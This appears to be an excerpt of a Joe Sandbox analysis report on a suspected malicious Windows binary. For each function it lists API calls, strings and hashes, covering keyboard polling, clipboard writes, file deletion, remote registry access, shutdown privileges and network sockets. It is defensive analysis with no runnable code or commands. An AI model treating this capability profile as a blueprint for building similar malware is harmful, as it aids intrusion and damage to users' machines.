Opcode Fuzzy Hash: 2195ea5758003629828c969040ff60fa49742d74b0e7169abfb2d2ce734635c0
Instruction Fuzzy Hash: 1C729071E04359DBDF24DF99C8507AEB7F5BF48310F1481AAE849EB281DB349A81DB90

Function 010263F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01026EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01025FA6,?), ref: 01026ED8

Part of subcall function 010272CB: GetFileAttributesW.KERNEL32(?,01026019), ref: 010272CC

_wcscat.LIBCMT ref: 01026441
__wsplitpath.LIBCMT ref: 0102645F
FindFirstFileW.KERNEL32(?,?), ref: 01026474
_wcscpy.LIBCMT ref: 010264A3
_wcscat.LIBCMT ref: 010264B8
_wcscat.LIBCMT ref: 010264CA
DeleteFileW.KERNEL32(?), ref: 010264DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 010264EB
FindClose.KERNEL32(00000000), ref: 01026506

Strings

\*.*, xrefs: 0102643B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 1d250b68f812dcae53cd45209cbc14a3c28f3ce9c1bb09fded18dd71a05c39e5
Instruction ID: ce2184ef4b330bbc7adda28195e254de5391f5fe3e5bbe6b19267ec20f9d1c16
Opcode Fuzzy Hash: 1d250b68f812dcae53cd45209cbc14a3c28f3ce9c1bb09fded18dd71a05c39e5
Instruction Fuzzy Hash: 383198B2408399AAD732DBE88884EDF77DCAF55210F44096EF9D9C3141EA36D10D8767

Function 010431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01043C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01042BB5,?,?), ref: 01043C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0104328E

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0104332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010433C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01043604
RegCloseKey.ADVAPI32(00000000), ref: 01043611

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 7094f071b938a43b86515ec5e2d417464ad160b1bb21a24ba618dbc2343ea0a2
Instruction ID: 9b9750f0a086f09498030f8f758587a08ed1de0d40bb8690392ffb22dffda33f
Opcode Fuzzy Hash: 7094f071b938a43b86515ec5e2d417464ad160b1bb21a24ba618dbc2343ea0a2
Instruction Fuzzy Hash: 8DE17D71604210AFDB14DF29C995E6EBBE8FF88310B04846DF58ADB2A1CB35E905CB91

Function 01022B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 01022B5F
GetAsyncKeyState.USER32(000000A0), ref: 01022BE0
GetKeyState.USER32(000000A0), ref: 01022BFB
GetAsyncKeyState.USER32(000000A1), ref: 01022C15
GetKeyState.USER32(000000A1), ref: 01022C2A
GetAsyncKeyState.USER32(00000011), ref: 01022C42
GetKeyState.USER32(00000011), ref: 01022C54
GetAsyncKeyState.USER32(00000012), ref: 01022C6C
GetKeyState.USER32(00000012), ref: 01022C7E
GetAsyncKeyState.USER32(0000005B), ref: 01022C96
GetKeyState.USER32(0000005B), ref: 01022CA8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7a5bef981e35c02a79077cb7011fe55e89f01c40461bbfd06cfbd1534b282785
Instruction ID: 3123a54de97663b77da2ce4948335d72fa6d09164888e5e59bba9ed6d13e7c27
Opcode Fuzzy Hash: 7a5bef981e35c02a79077cb7011fe55e89f01c40461bbfd06cfbd1534b282785
Instruction Fuzzy Hash: 0C41E6306047DD6DFFB29AE884043B5BEE16F01318F1480D9DAC6576C3DBA995C8C7A2

Function 01036D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 01036D2E
EmptyClipboard.USER32 ref: 01036D34
GlobalAlloc.KERNEL32(00000002,?), ref: 01036D49
CloseClipboard.USER32 ref: 01036DE8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: aa3195a8e7ce9e595c9f145dfdf67a33aa7944dbcc03e73dac8eb782ab4ad060
Instruction ID: 99afb83aa2f550fc6de1a2541ee2f98e5b8dc1e2ac251984020530950407d51e
Opcode Fuzzy Hash: aa3195a8e7ce9e595c9f145dfdf67a33aa7944dbcc03e73dac8eb782ab4ad060
Instruction Fuzzy Hash: B121A331700511AFD721AF55D849F6D77A8EF48720F048419F9C6DB2A1CB7AED008B50

Function 0103C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 01019ABF: CLSIDFromProgID.OLE32 ref: 01019ADC
Part of subcall function 01019ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 01019AF7
Part of subcall function 01019ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 01019B05
Part of subcall function 01019ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 01019B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0103C235
_memset.LIBCMT ref: 0103C242
_memset.LIBCMT ref: 0103C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0103C38C
CoTaskMemFree.OLE32(?), ref: 0103C397

Strings

NULL Pointer assignment, xrefs: 0103C3E5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 00b1db5f843beee3a3108c38ba67a467d8f8a1a4b13b2c934cef598a125aa000
Instruction ID: d850a68127e4f8b6a9f91a786fbc0260a1317eadbf00d4b85fa73e6abca46692
Opcode Fuzzy Hash: 00b1db5f843beee3a3108c38ba67a467d8f8a1a4b13b2c934cef598a125aa000
Instruction Fuzzy Hash: DF913871D00219ABEB10DF95DC84EEEBBB8AF48710F10816AF559B7281DB719A45CFA0

Function 010279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0101B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101B180
Part of subcall function 0101B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101B1AD
Part of subcall function 0101B134: GetLastError.KERNEL32 ref: 0101B1BA

ExitWindowsEx.USER32(?,00000000), ref: 01027A0F

Strings

@, xrefs: 01027A02
SeShutdownPrivilege, xrefs: 010279DD
, xrefs: 010279FD

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 7cd4663520ad9adb288bb4c3d059e19f8450a59e4d1c820bfe1da951b52a7106
Instruction ID: 9874678654b73617886502d9bdd536d0c375db9b6429bc1db93396fb44d166f5
Opcode Fuzzy Hash: 7cd4663520ad9adb288bb4c3d059e19f8450a59e4d1c820bfe1da951b52a7106
Instruction Fuzzy Hash: 40012B717513726AF77816FCDC5ABFF369C9B60260F140864EEC3E20D2D5A55E0082B4

Function 01038C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01038CA8
WSAGetLastError.WSOCK32(00000000), ref: 01038CB7
bind.WSOCK32(00000000,?,00000010), ref: 01038CD3
listen.WSOCK32(00000000,00000005), ref: 01038CE2
WSAGetLastError.WSOCK32(00000000), ref: 01038CFC
closesocket.WSOCK32(00000000,00000000), ref: 01038D10

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 41e6c0780c4099dd2eecf3bacade4fe1a18c66811441e4afe8d295f7cd151d37
Instruction ID: 55552eca71d469916f13ece7aeb055dc6825a71050ead02912617f5ef287fc77
Opcode Fuzzy Hash: 41e6c0780c4099dd2eecf3bacade4fe1a18c66811441e4afe8d295f7cd151d37
Instruction Fuzzy Hash: 6A21E4316002059FDB60EF68CD48B6E77E9FF88720F108199FA96A73D1CB78AD018B51

Function 01026532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 01026554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 01026564
Process32NextW.KERNEL32(00000000,0000022C), ref: 01026583
__wsplitpath.LIBCMT ref: 010265A7
_wcscat.LIBCMT ref: 010265BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 010265F9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: c567e70cb3b3683a057670d270fb4b4c650d55ea6dec1030bd216dc5bc1cebfe
Instruction ID: 3118f1df7318b60ae976ae014334100fc5b56514578ec2463ddb4ef8b851c62e
Opcode Fuzzy Hash: c567e70cb3b3683a057670d270fb4b4c650d55ea6dec1030bd216dc5bc1cebfe
Instruction Fuzzy Hash: F2215A71900229EBDB21ABA4C988FEDB7FCAB45300F5004E5E985D7145D7769B85CB60

Function 0103923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0103A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0103A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 01039296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 010392B9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: a91bc14aca2644260e55000a13698f5ffb4644f9b4afceda92cd19359746aef1
Instruction ID: de0211c140789899dd2e31626d5a4bc104a54e8d1c31d5e1f97c77a3f649bbaa
Opcode Fuzzy Hash: a91bc14aca2644260e55000a13698f5ffb4644f9b4afceda92cd19359746aef1
Instruction Fuzzy Hash: A441D570600504AFEB14AF68CC41E7E77EDEF84724F048448FA96AB3D2DBB99D019B91

Function 0102EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0102EB8A
_wcscmp.LIBCMT ref: 0102EBBA
_wcscmp.LIBCMT ref: 0102EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0102EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0102EC0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: cec0a931506892c55dc218808e0685905eab6c3501af3955dbf8f514c047e7c8
Instruction ID: b62a27c4d55e3e9cc29c91f85341f7c77150a7f1001eee6cd402468a68758282
Opcode Fuzzy Hash: cec0a931506892c55dc218808e0685905eab6c3501af3955dbf8f514c047e7c8
Instruction Fuzzy Hash: E141EF34600306DFD718DF68C890AAAB7E4FF49324F10455DEA9ACB3A1DB35E941CB91

Function 01048111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 01048160
IsWindowEnabled.USER32 ref: 0104816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0104817B
IsIconic.USER32 ref: 01048189
IsZoomed.USER32 ref: 01048197

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8713d73357b5c30f869fd2de751300327ed72d27cab421253d9f1231d8f62011
Instruction ID: 3bca59ccd5310f6a75c7727a878a58505dc39eb955939c736db1610a97641e0e
Opcode Fuzzy Hash: 8713d73357b5c30f869fd2de751300327ed72d27cab421253d9f1231d8f62011
Instruction Fuzzy Hash: 7C11E6713001106BE7212FAADC84E6F7B9CEF44760B05483BF9C5D3261DB79980187A0

Function 00FE9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00FE9E95
ERCP, xrefs: 00FE9C32
VUUU, xrefs: 0106BE14
VUUU, xrefs: 00FE9EA7
VUUU, xrefs: 00FE9ED4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: b5cb0764e7fa4f1b653ddbea87c86e35815e9d3fb97870971ca9e3df803eaa87
Instruction ID: 560ea0991162970e1138dd7c93ca12bcef02d47941b7c81aa348bd4758d16e5c
Opcode Fuzzy Hash: b5cb0764e7fa4f1b653ddbea87c86e35815e9d3fb97870971ca9e3df803eaa87
Instruction Fuzzy Hash: F592C071E0425ACBEF34CF59C8407ADB7B5BB44310F14819AE996EB280D771AD81EFA1

Function 00FFE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FFE014,75920AE0,00FFDEF1,0107DC38,?,?), ref: 00FFE02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FFE03E

Strings

kernel32.dll, xrefs: 00FFE027
GetNativeSystemInfo, xrefs: 00FFE038

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: f91a0406b997c1a6170b32bc294032aeaf7029e6dd0e30661df1d018d9a7f798
Instruction ID: 5c957a709ba3f091d00ccdb1f3650f5382d83a346454bd6bb7dcc4c7d2d0d954
Opcode Fuzzy Hash: f91a0406b997c1a6170b32bc294032aeaf7029e6dd0e30661df1d018d9a7f798
Instruction Fuzzy Hash: FAD0A730901712FFCB314FA2E89862276D8AF00310F18441DE4D1D6134DBF8C8849750

Function 01026713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 01026733
_memset.LIBCMT ref: 01026754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 010267A6
CloseHandle.KERNEL32(00000000), ref: 010267AF

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 60e51aac0dcc6ee09edca867d13a2e831dc02549f7ead15fffac3f21dce5ebba
Instruction ID: 05e11059f3628c4e29c947f76af0aad20cfccc3d411c5080c7b2fca9abbd138e
Opcode Fuzzy Hash: 60e51aac0dcc6ee09edca867d13a2e831dc02549f7ead15fffac3f21dce5ebba
Instruction Fuzzy Hash: BB11A7759012287AE73056A5AC4DFABBABCEF44760F10419AF944E71D0D6744E808B74

Function 010213CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 010213DC

Strings

(, xrefs: 01021422
|, xrefs: 0102140C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: dfca661052c12bce3c4635f1b856897f355684fbba224c5744ffaaa934e6cb00
Instruction ID: 026e0bc43aab1cc09caef3ad6ac3c68289800149e0156a7b5dac140789b8214c
Opcode Fuzzy Hash: dfca661052c12bce3c4635f1b856897f355684fbba224c5744ffaaa934e6cb00
Instruction Fuzzy Hash: E7321575A00615DFDB28CF69C48096AB7F0FF48310B15C5AEE59ADB3A2EB70E941CB44

Function 00FFB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00FFB22F

Part of subcall function 00FFB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FFB5A5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 1e1735c0a14649b9c2978fe933be219a19319f2a11b7e81c3d68e21adb54a5b8
Instruction ID: 5a10a9773dccb2dff8af6b278f04a1b3742bf37710385aed13b4600b1d8755a2
Opcode Fuzzy Hash: 1e1735c0a14649b9c2978fe933be219a19319f2a11b7e81c3d68e21adb54a5b8
Instruction Fuzzy Hash: 2DA136B151400EBAEB696B2DCCC8EBF7D9CEF55350B444119FBC1D21A2DB299D00B272

Function 01034EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,010343BF,00000000), ref: 01034FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01034FD2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
